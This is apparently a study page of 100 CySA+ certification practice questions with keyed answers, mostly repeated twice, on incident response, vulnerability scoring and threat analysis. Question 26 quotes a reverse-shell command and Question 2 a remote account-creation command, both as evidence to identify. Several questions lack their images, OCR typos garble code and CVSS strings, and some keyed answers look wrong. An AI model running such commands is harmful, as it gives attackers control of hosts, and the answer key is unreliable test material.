cysa+1

100問 • 2年前

問題一覧

QUESTION 1 A technician identifies a vulnerability on a server and applies a software patch. Which of the following should be the next step in the remediation process?

Validation

QUESTION 2 The analyst reviews the following endpoint log entry: invoke-command -ComputerName clientcomputerl -Credential xyzcompany\ adninistrator -ScriptBlock (HOSTName) clientcomputez1 invoke-command -ComputerNaze clíentcomputer1 -Credential xyzcompany\ administrator -ScriptBlock (net user /add inveke_u1} The command completed success fully. Which of the following has occurred?

New account introduced

QUESTION 3 A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM. The analyst no longer had to jump between tools. Which of the following best describes what the security program did?

Single pane of glass

QUESTION 4 Due to reports of unauthorized activity that was occurring on the internal network, an analyst is performing a network discovery. The analyst runs an Nmap scan against a corporate network to evaluate which devices were operating in the environment. Given the following output: look at image! Which of the following choices should the analyst look at first?

p4wnp1_aloa.lan (192.168.86.56)

QUESTION 5 When starting an investigation, which of the following must be done first?

Secure the scene

QUESTION 6 New employees in an organization have been consistently plugging in personal webcams despite the company policy prohibiting use of personal devices. The SOC manager discovers that new employees are not aware of the company policy. Which of the following will the SOC manager most likely recommend to help ensure new employees are accountable for following the company policy?

All new employees must sign a user agreement to acknowledge the company security policy

QUESTION 7 An analyst has been asked to validate the potential risk of a new ransomware campaign that the Chief Financial Officer read about in the newspaper. The company is a manufacturer of a very small spring used in the newest fighter jet and is a critical piece of the supply chain for this aircraft. Which of the following would be the best threat intelligence source to learn about this new campaign?

Information sharing organization

QUESTION 8 An incident response team finished responding to a significant security incident. The management team has asked the lead analyst to provide an after-action report that includes lessons learned. Which of the following is the most likely reason to include lessons learned?

To identify areas of improvement in the incident response process

QUESTION 9 A vulnerability management team is unable to patch all vulnerabilities found during their weekly Scans. Using the third-party scoring system described below, the team patches the most urgent vulnerabilities: look at image! Additionally, the vulnerability management team feels that the metrics Smear and Channing are less important than the others, so these will be lower in priority. Which of the following vulnerabilities should be patched first, given the above third-party scoring system?

TSpirit: Cobain: Yes Grohl: Yes Novo: Yes Smear: No Channing: No

QUESTION 10 A user downloads software that contains malware onto a computer that eventually infects numerous other systems. Which of the following has the user become?

Insider Threat

QUESTION 11 An organization has activated the CSIRT. A security analyst believes a single virtual server was compromised and immediately isolated from the network. Which of the following should the CSIRT conduct next?

Take a snapshot of the compromised server and verify its integrity

QUESTION 12 During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related to its volatility level?

Running processes

QUESTION 13 A security analyst is trying to identify possible network addresses from different source networks belonging to the same company and region. Which of the following shell script functions could help achieve the goal?

function y() { dig $(dig x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" {print $1}).origin.asn.cymru.com TXT +short}

QUESTION 14 A security analyst is writing a shell script to identify IP addresses from the same country. Which of the following functions would help the analyst achieve the objective?

function x() { info-$(geoiplookup $1) && echo "$1 | Sinfo" }

QUESTION 15 A security analyst obtained the following table of results from a recent vulnerability assessment that was conducted against a single web server in the environment: look at image* Which of the following should be completed first to remediate the findings?

Perform proper sanitization on all fields

QUESTION 16 A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege escalation, and has a significant impact to confidentiality and integrityy but not to availability. Which of the following CVE metrics would be most accurate for this zero-day threat?

CVSS:31/AV:N/AC:L/PR:N/UI:N/S:U/C:H/l:H/A:L

Which of the following tools would work best to prevent the exposure of Pll outside of an organization?

DLP

look at image*

Block requests without an X-Frame-Options header

QUESTION 19 Which of the following items should be included in a vulnerability scan report? (Choose two.)

Affected hosts, Risk score

QUESTION 20 The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch was released. Which of the following would best protect this organization?

A mean time to respond of 15 days

QUESTION 21 A security analyst recently joined the team and is trying to determine which scripting language is being used in a production script to determine if it is malicious. Given the following script: look at image*

PowerShell

QUESTION 22 A company's user accounts have been compromised. Users are also reporting that the company's internal portal is sometimes only accessible through HTTP, other times; it is accessible through HTTPS. Which of the following most likely describes the observed activity?

An on-path attack is being performed by someone with internal access that forces users into port 80

A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago: but the report did not have a follow-up remediation response from an analyst. Which of the following documents should the SOC manager review to ensure the team is meeting the appropriate contractual obligations for the customer?

SLA

QUESTION 24 Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target?

Command and control

QUESTION 25 A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of the following would best meet this requirement?

Agent-based

QUESTION 26 A security analyst detects an exploit attempt containing the following command: sh -i >& /dev/udp/10.1.1.1/4821 0>$1 Which of the following is being attempted?

Reverse Shell

QUESTION 27 An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?

Weaponization

look at image *

54.74.110.228

QUESTION 29 A security analyst is tasked with prioritizing vulnerabilities for remediation. The relevant company security policies are shown below: Security Policy 1006: Vulnerability Management 1. The Company shall use the CVSSV3.1 Base Score Metrics (Exploitability and Impact) prioritize the remediation of security vulnerabilities. 2. In situations where a choice must be made between confidentiality and availability, the Company shall prioritize confidentiality of data over availability of systems and data. 3. The Company shall prioritize patching of publicly available systems and services over patching of internally available system. According to the security policy, which of the following vulnerabilities should be the highest priority to patch?

Name: CAP.SHIELD - CVSS 3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/:N/A:N External System

QUESTION 30 Which of the following will most likely ensure that mission-critical services are available in the event of an incident?

Disaster recovery plan

QUESTION 31 The Chief Information Security Officer wants to eliminate and reduce shadow IT in the enterprise. Several high-risk cloud applications are used that increase the risk to the organization. Which of the following solutions will assist in reducing the risk?

Deploy a CASB and enable policy enforcement

QUESTION 32 An incident response team receives an alert to start an investigation of an internet outage. The outage is preventing all users in multiple locations from accessing external SaaS resources. The team determines the organization was impacted by a DDOS attack. Which of the following logs should the team review first?

DNS

QUESTION 33 A malicious actor has gained access to an internal network by means of social engineering. The actor does not want to lose access in order to continue the attack. Which of the following best describes the current stage of the Cyber Kill Chain that the threat actor is currently operating in?

Exploitation

QUESTION 34 An analyst finds that an IP address outside of the company network that is being used to run network and vulnerability scans across external-facing assets. Which of the following steps of an attack framework is the analyst witnessing?

Reconnaissance

QUESTION 35 An incident response analyst notices multiple emails traversing the network that target only the administrators of the company. The email contains a concealed URL that leads to an unknown website in another country. Which of the following best describes what is happening? (Choose two.)

Social engineering attack, Obfuscated links

QUESTION 36 During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application. Which of the following recommendations would best mitigate this problem if applied along the SDLC phase?

Use application security scanning as part of the pipeline for the CI/CD flow

QUESTION 37 An analyst is reviewing a vulnerability report and must make recommendations to the executive team. The analyst finds that most systems can be upgraded with a reboot resulting in a single downtime window. However, two of the critical systems cannot be upgraded due to a vendor appliance that the company does not have access to. Which of the following inhibitors to remediation do these systems and associated vulnerabilities best represent?

Proprietary systems

QUESTION 38 A company is in the process of implementing a vulnerability management program, and there are concerns about granting the security team access to sensitive data. Which of the following scanning methods can be implemented to reduce the access to systems while providing the most accurate vulnerability scan results?

Agent-based scanning

QUESTION 39 A security analyst is trying to identify anomalies on the network routing. Which of the following functions can the analyst use on a shell script to achieve the objective most accurately?

function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" {print $1} ).origin.asn.cymru.com TXT +short) && echo "$1 | $info" }

QUESTION 40 There are several reports of sensitive information being disclosed via file sharing services. The company would like to improve its security posture against this threat. Which of the following security controls would best support the company in this scenario?

Improve employee training and awareness

QUESTION 41 Which of the following is the best way to begin preparation for a report titled "What We Learned" regarding a recent incident involving a cybersecurity breach?

Determine the sophistication of the audience that the report is meant for

QUESTION 42 A security analyst is performing an investigation involving multiple targeted Windows malware binaries. The analyst wants to gather intelligence without disclosing information to the attackers. Which of the following actions would allow the analyst to achieve the objective?

Upload the binary to an air gapped sandbox for analysis

QUESTION 43 Which of the following would help to minimize human engagement and aid in process improvement in security operations?

SOAR

QUESTION 44 After conducting a cybersecurity risk assessment for a new software request, a Chief Information Security Officer (CiSO) decided the risk score would be too high. The CISO refused the software request. Which of the following risk management principles did the CISO select?

Avoid

QUESTION 45 Which of the following is an important aspect that should be included in the lessons-learned step after an incident?

ldentify any improvements or changes in the incident response plan or procedures

QUESTION 46 The security operations team is required to consolidate several threat intelligence feeds due to redundant tools and portals. Which of the following will best achieve the goal and maximize results?

Single pane of glass

QUESTION 47 Which of the following would a security analyst most likely use to compare TTPS between different known adversaries of an organization?

MITRE ATT&CK

QUESTION 48 The security team reviews a web server for XSS and runs the following Nmap scan:

The vulnerable parameter and characters > and " with a reflected XSS attempt

QUESTION 49 Which of the following is the best action to take after the conclusion of a security incident to improve incident response in the future?

Schedule a review with all teams to discuss what occurred

QUESTION 50 A security analyst received a malicious binary file to analyze. Which of the following is the best technique to perform the analysis?

Reverse engineering

QUESTION 51 An incident response team found loCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the following pieces of data should be collected first in order to preserve sensitive information before isolating the server?

Malicious files

QUESTION 52 Which of the following security operations tasks are ideal for automation?

Email header analysis: -Check the email header for a phishing confidence metric greater than or equal to five -Add the domain of sender to the block list -Move the email to quarantine

QUESTION 53 An organization has experienced a breach of customer transactions. Under the terms of PCI DSS, which of the following groups should the organization report the breach to?

Card issuer

QUESTION 54 Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?

Mean time to detect

QUESTION 55 A company is implementing a vulnerability management program and moving from an on-premises environment to a hybrid laaS cloud environment. Which of the following implications should be considered on the new hybrid environment?

Cloud-specific misconfigurations may not be detected by the current scanners

QUESTION 56 A security alert was triggered when an end user tried to access a website that is not allowed per organizational policy. Since the action is considered a terminable offense, the SOC analyst collects the authentication logs, web logs, and temporary files, reflecting the web searches from the user's workstation, to build the case for the investigation. Which of the following is the best way to ensure that the investigation complies with HR or privacy policies?

Ensure that the case details do not reflect any user-identifiable information Password protect the evidence and restrict access to personnel related to the investigation

QUESTION 57 Which of the following is the first step that should be performed when establishing a disaster recovery plan?

Agree on the goals and objectives of the plan

QUESTION 58 Which of the following describes how a CSIRT Iead determines who should be communicated with and when during a security incident?

The lead should review what is documented in the incident response policy or plan

QUESTION 59 A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the organization. Which of the following will produce the data needed for the briefing?

Indicators of compromise

QUESTION 60 An analyst notices there is an internal device sending HTTPS traffic with additional characters in the header to a known-malicious IP in another country. Which of the following describes what the analyst has noticed?

Beaconing

QUESTION 61 A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a potentially compromised machine. The analyst sets the following display filter: ftp. The analyst can see there are several RETR requests with 226 Transfer complete responses, but the packet list pane is not showing the packets containing the file transfer itself. Which of the following can the analyst perform to see the entire contents of the downloaded files?

Change the display filter to ftp-data and follow the TCP streams

QUESTION 62 An analyst is remediating items associated with a recent incident. The analyst has isolated the vulnerability and is actively removing it from the system. Which of the following steps of the process does this describe?

Eradication

QUESTION 63 Joe, a leading sales person at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with his current employer. Joe is soliciting his current employer's customers. However, Joe has not resigned or discussed this with his current supervisor yet. Which of the following would be the best action for the incident response team to recommend?

Perform no action until HR or legal counsel advises on next steps

QUESTION 64 The Chief Information Security Officer is directing a new program to reduce attack surface risks and threats as part of a zero trust approach. The IT security team is required to come up with priorities for the program. Which of the following is the best priority based on common attack frameworks?

Reduce the administrator and privileged access accounts

QUESTION 65 During an extended holiday break, a company suffered a security incident. This information was properly relayed to appropriate personnel in a timely manner and the server was up to date and configured with appropriate auditing and logging. The Chief Information Security Officer wants to find out precisely what happened. Which of the following actions should the analyst take first?

Clone the virtual server for forensic analysis

QUESTION 66 A systems administrator is reviewing after-hours traffic flows from data-center servers and sees regular outgoing HTTPS connections from one of the servers to a public IP address. The server should not be making outgoing connections after hours. Looking closer, the administrator sees this traffic pattern around the clock during work hours as well. Which of the following is the most likely explanation?

C2 beaconing activity

QUESTION 67 A software developer is correcting the error-handling capabilities of an application following the initial coding of the fix. Which of the following would the software developer MOST likely performed to validate the code poor to pushing it to production?

Static analysis

QUESTION 68 Forming a hypothesis, looking for indicators of compromise, and using the findings to proactively improve detection capabilities are examples of the value of:

threat hunting.

QUESTION 69 Which of the following BEST explains the function of a managerial control?

To create data classification, risk assessments, security control reviews, and contingency planning

QUESTION 70 Which of the following types of controls defines placing an ACL on a file folder?

Technical control

QUESTION 71 A code review reveals a web application is using lime-based cookies for session management. This is a security concern because lime-based cookies are easy to:

parameterize

QUESTION 72 A security analyst discovers suspicious host activty while performing monitoring activities. The analyst pulls a packet capture for the activity and sees the following:

The host downloaded an application from utoftor.com.

image*

User 2

A consultant evaluating multiple threat intelligence leads to assess potential risks for a client. Which of the following is the BEST approach for the consultant to consider when modeling the client's attack surface?

Look at attacks against similar industry peers and assess the probability of the same attacks happening.

QUESTION 75 Which of the following, BEST explains the function of TPM?

To provide hardware-based security features using unique keys

QUESTION 76 An analyst determines a security incident has occurred. Which of the following is the most appropriate NEXT step in an incident response plan?

Consult the communications plan

QUESTION 77 A company's application development has been outsourced to a third-party development team. Based on the SLA, the development team must follow industry best practices for secure coding. Which of the following is the BEST way to verify this agreement?

Application fuzzing

QUESTION 78 A security administrator needs to provide access from partners to an Isolated laboratory network inside an organization that meets the following requirements: - The partners' PCs must not connect directly to the laboratory network. - The tools the partners need to access while on the laboratory netwOrk must be available to all partners - The partners must be able to run analyses on the laboratory netWork, which may take hours to complete Which of the following capabilities will MOST likely meet the security objectives of the request?

Deployment of a jump box to allow access to the laboratory network and use of VDl in persistent mode to provide the necessary tools for analysis

QUESTION 79 Which of the following are the MOST likely reasons lo include reporting processes when updating an incident response plan after a breach? (Select TWO).

To establish a clear chain of command, To meet regulatory requirements for timely reporting

QUESTION 80 Which of the following is MOST dangerous to the client environment during a vulnerability assessment penetration test?

The testing is outside the contractual scope

QUESTION 81 Which of the following is MOST important when developing a threat hunting program?

Understanding security software technologies

image*

Uninstall the DNS service, Disable the Telnet service

QUESTION 83 Which of the following BEST describes HSM?

A computing device that manages digital keys, performs encryption/decryption functions, and maintains other cryptographic functions

QUESTION 84 A threat hurting team received a new loC from an ISAC that follows a threat actor's profile and activities. Which of the following should be updated NEXT?

The IDS signature

QUESTION 85 Which of the following BEST describes what an organizations incident response plan should cover regarding how the organization handles public or private disclosures of an incident?

The disclosure section should contain the organization's legal and regulatory requirements the incident regarding disclosures.

QUESTION 86 An IT security analyst has received an email alert regarding a vulnerability within the new fleet of vehicles the company recently purchased. Which of the following attack vectors is the vulnerability MOST likely targeting?

CAN bus

QUESTION 87 After examining a header and footer file, a security analyst begins reconstructing files by scanning the raw data bytes of a hard disk and rebuilding them. Which of the following techniques is the analyst using?

File carving

QUESTION 88 An organization is experiencing security incidents in which a systems administrator is creating unauthorized user accounts A security analyst has created a script to snapshot the system configuration each day. Following iss one of the scripts: cat /etc/passwd > daily_$ (date +"%m_%d_%Y") This script has been running successfully every day. Which of the following commands would provide the analyst with additional useful information relevant to the above script?

diff daily_11_03_2019 daily_11_04_2019

image*

The DMARC record's policy tag is incorrectly configured.

QUESTION 90 Which of the following BEST explains the function of trusted firmware updates as they relate to hardware assurance?

Trusted firmware updates provide organizations with secure code signing, distribution, installation, and attestation for embedded devices.

QUESTION 91 A help desk technician inadvertently sent the credentials of the company's CRM n clear text to an employee's personal email account. The technician then reset the employee's account using the appropriate process and the employee's corporate enmail, and notified the security team of the incident According to the incident response procedure, which of the following should the security team do NEXT?

Prepare an incident summary report.

QUESTION 92 A developer downloaded and attempted to install a file transfer application in which the installation package is bundled with adware. The next-generation antivirus software prevented the file from executing, but it did not remove the file from the device. Over the next few days, more developers tried to download and execute the offending file. Which of the following changes should be made to the security tools to BEST remedy the issue?

Block the download of the file via the web proxy.

QUESTION 93 After detecting possible malicious external scanning, an internal vulnerability scan was performed, and a critical server was found with an outdated version of JBoss. A legacy application that is running depends on that version of JBoss. Which of the following actions should be taken FIRST to prevent server compromise and business disruption at the same time?

Create a proper DMZ for outdated components and segregate the JBoss server.

QUESTION 94 An incident response team detected malicious software that could have gained access to credit card data. The incident response team was able to mitigate significant damage and implement corrective actions. By having incident response mechanisms in place. Which of the following should be notified for lessons learned?

Company leadership

QUESTION 95 In SIEM software, a security analysis selected some changes to hash signatures from monitored files during the night followed by SMB brute-force attacks against the file servers Based on this behavior, which of the following actions should be taken FIRST to prevent a more serious compromise?

Fully segregate the affected servers physically in a network segment, apart from the production network.

QUESTION 96 While implementing a PKI for a company, a security analyst plans to utilize a dedicated server as the certificate authority that is only used to sign intermediate certificates. Which of the following are the MOST secure states for the certificate authority server when it is not in use? (Choose two.)

Full disk encrypted, Air gapped

QUESTION 97 Which of the following BEST identifies the appropriate use of threat intelligence as a function of detection and response?

To identify likely attack scenarios within an organization

QUESTION 98 image*

Delete BusinessUsr access key 1.

QUESTION 99 An internally developed file-monitoring system identified the following except as causing a program to crash often: char filedata [100] ; fp = fopen (‘access.log’, ‘r'); srtcopy (filedata, fp); printf (‘%s\n', filedata) ; Which of the following should a security analyst recommend to fix the issue?

Replace the strcpy function.

100

QUESTION 100 An organization has the following policy statements: - All emails entering or leaving the organization will be subject to inspection for malware, policy violations, and unauthorized coolant. - All network activity will be logged and monitored. - Confidential data will be tagged and tracked Confidential data must never be transmitted in an unencrypted form. - Confidential data must never be stored on an unencrypted mobile device. Which of the following is the organization enforcing?

Data management policy

security+1

security+1

security+2

security+2

security+6

security+6

security+7

security+7

security+8

security+8

security+9

security+9

security+10

security+10

security+11

security+11

security+12

security+12

cysa+2

cysa+2

cysa+3

cysa+3

A+1

A+1

問題一覧

QUESTION 1 A technician identifies a vulnerability on a server and applies a software patch. Which of the following should be the next step in the remediation process?

Validation

New account introduced

Single pane of glass

p4wnp1_aloa.lan (192.168.86.56)

QUESTION 5 When starting an investigation, which of the following must be done first?

Secure the scene

All new employees must sign a user agreement to acknowledge the company security policy

Information sharing organization

To identify areas of improvement in the incident response process

TSpirit: Cobain: Yes Grohl: Yes Novo: Yes Smear: No Channing: No

QUESTION 10 A user downloads software that contains malware onto a computer that eventually infects numerous other systems. Which of the following has the user become?

Insider Threat

Take a snapshot of the compromised server and verify its integrity

QUESTION 12 During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related to its volatility level?

Running processes

function y() { dig $(dig x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" {print $1}).origin.asn.cymru.com TXT +short}

QUESTION 14 A security analyst is writing a shell script to identify IP addresses from the same country. Which of the following functions would help the analyst achieve the objective?

function x() { info-$(geoiplookup $1) && echo "$1 | Sinfo" }

Perform proper sanitization on all fields

CVSS:31/AV:N/AC:L/PR:N/UI:N/S:U/C:H/l:H/A:L

Which of the following tools would work best to prevent the exposure of Pll outside of an organization?

DLP

look at image*

Block requests without an X-Frame-Options header

QUESTION 19 Which of the following items should be included in a vulnerability scan report? (Choose two.)

Affected hosts, Risk score

A mean time to respond of 15 days

PowerShell

An on-path attack is being performed by someone with internal access that forces users into port 80

SLA

QUESTION 24 Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target?

Command and control

Agent-based

QUESTION 26 A security analyst detects an exploit attempt containing the following command: sh -i >& /dev/udp/10.1.1.1/4821 0>$1 Which of the following is being attempted?

Reverse Shell

Weaponization

look at image *

54.74.110.228

Name: CAP.SHIELD - CVSS 3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/:N/A:N External System

QUESTION 30 Which of the following will most likely ensure that mission-critical services are available in the event of an incident?

Disaster recovery plan

Deploy a CASB and enable policy enforcement

DNS

Exploitation

Reconnaissance

Social engineering attack, Obfuscated links

Use application security scanning as part of the pipeline for the CI/CD flow

Proprietary systems

Agent-based scanning

QUESTION 39 A security analyst is trying to identify anomalies on the network routing. Which of the following functions can the analyst use on a shell script to achieve the objective most accurately?

function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" {print $1} ).origin.asn.cymru.com TXT +short) && echo "$1 | $info" }

Improve employee training and awareness

QUESTION 41 Which of the following is the best way to begin preparation for a report titled "What We Learned" regarding a recent incident involving a cybersecurity breach?

Determine the sophistication of the audience that the report is meant for

Upload the binary to an air gapped sandbox for analysis

QUESTION 43 Which of the following would help to minimize human engagement and aid in process improvement in security operations?

SOAR

Avoid

QUESTION 45 Which of the following is an important aspect that should be included in the lessons-learned step after an incident?

ldentify any improvements or changes in the incident response plan or procedures

Single pane of glass

QUESTION 47 Which of the following would a security analyst most likely use to compare TTPS between different known adversaries of an organization?

MITRE ATT&CK

QUESTION 48 The security team reviews a web server for XSS and runs the following Nmap scan:

The vulnerable parameter and characters > and " with a reflected XSS attempt

QUESTION 49 Which of the following is the best action to take after the conclusion of a security incident to improve incident response in the future?

Schedule a review with all teams to discuss what occurred

QUESTION 50 A security analyst received a malicious binary file to analyze. Which of the following is the best technique to perform the analysis?

Reverse engineering

Malicious files

QUESTION 52 Which of the following security operations tasks are ideal for automation?

Email header analysis: -Check the email header for a phishing confidence metric greater than or equal to five -Add the domain of sender to the block list -Move the email to quarantine

QUESTION 53 An organization has experienced a breach of customer transactions. Under the terms of PCI DSS, which of the following groups should the organization report the breach to?

Card issuer

QUESTION 54 Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?

Mean time to detect

Cloud-specific misconfigurations may not be detected by the current scanners

Ensure that the case details do not reflect any user-identifiable information Password protect the evidence and restrict access to personnel related to the investigation

QUESTION 57 Which of the following is the first step that should be performed when establishing a disaster recovery plan?

Agree on the goals and objectives of the plan

QUESTION 58 Which of the following describes how a CSIRT Iead determines who should be communicated with and when during a security incident?

The lead should review what is documented in the incident response policy or plan

QUESTION 59 A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the organization. Which of the following will produce the data needed for the briefing?

Indicators of compromise

Beaconing

Change the display filter to ftp-data and follow the TCP streams

Eradication

Perform no action until HR or legal counsel advises on next steps

Reduce the administrator and privileged access accounts

Clone the virtual server for forensic analysis

C2 beaconing activity

Static analysis

QUESTION 68 Forming a hypothesis, looking for indicators of compromise, and using the findings to proactively improve detection capabilities are examples of the value of:

threat hunting.

QUESTION 69 Which of the following BEST explains the function of a managerial control?

To create data classification, risk assessments, security control reviews, and contingency planning

QUESTION 70 Which of the following types of controls defines placing an ACL on a file folder?

Technical control

QUESTION 71 A code review reveals a web application is using lime-based cookies for session management. This is a security concern because lime-based cookies are easy to:

parameterize

QUESTION 72 A security analyst discovers suspicious host activty while performing monitoring activities. The analyst pulls a packet capture for the activity and sees the following:

The host downloaded an application from utoftor.com.

image*

User 2

Look at attacks against similar industry peers and assess the probability of the same attacks happening.

QUESTION 75 Which of the following, BEST explains the function of TPM?

To provide hardware-based security features using unique keys

QUESTION 76 An analyst determines a security incident has occurred. Which of the following is the most appropriate NEXT step in an incident response plan?

Consult the communications plan

Application fuzzing

Deployment of a jump box to allow access to the laboratory network and use of VDl in persistent mode to provide the necessary tools for analysis

QUESTION 79 Which of the following are the MOST likely reasons lo include reporting processes when updating an incident response plan after a breach? (Select TWO).

To establish a clear chain of command, To meet regulatory requirements for timely reporting

QUESTION 80 Which of the following is MOST dangerous to the client environment during a vulnerability assessment penetration test?

The testing is outside the contractual scope

QUESTION 81 Which of the following is MOST important when developing a threat hunting program?

Understanding security software technologies

image*

Uninstall the DNS service, Disable the Telnet service

QUESTION 83 Which of the following BEST describes HSM?

A computing device that manages digital keys, performs encryption/decryption functions, and maintains other cryptographic functions

QUESTION 84 A threat hurting team received a new loC from an ISAC that follows a threat actor's profile and activities. Which of the following should be updated NEXT?

The IDS signature

QUESTION 85 Which of the following BEST describes what an organizations incident response plan should cover regarding how the organization handles public or private disclosures of an incident?

The disclosure section should contain the organization's legal and regulatory requirements the incident regarding disclosures.

CAN bus

File carving

diff daily_11_03_2019 daily_11_04_2019

image*

The DMARC record's policy tag is incorrectly configured.

QUESTION 90 Which of the following BEST explains the function of trusted firmware updates as they relate to hardware assurance?

Trusted firmware updates provide organizations with secure code signing, distribution, installation, and attestation for embedded devices.

Prepare an incident summary report.

Block the download of the file via the web proxy.

Create a proper DMZ for outdated components and segregate the JBoss server.

Company leadership

Fully segregate the affected servers physically in a network segment, apart from the production network.

Full disk encrypted, Air gapped

QUESTION 97 Which of the following BEST identifies the appropriate use of threat intelligence as a function of detection and response?

To identify likely attack scenarios within an organization

QUESTION 98 image*

Delete BusinessUsr access key 1.

Replace the strcpy function.

100

Data management policy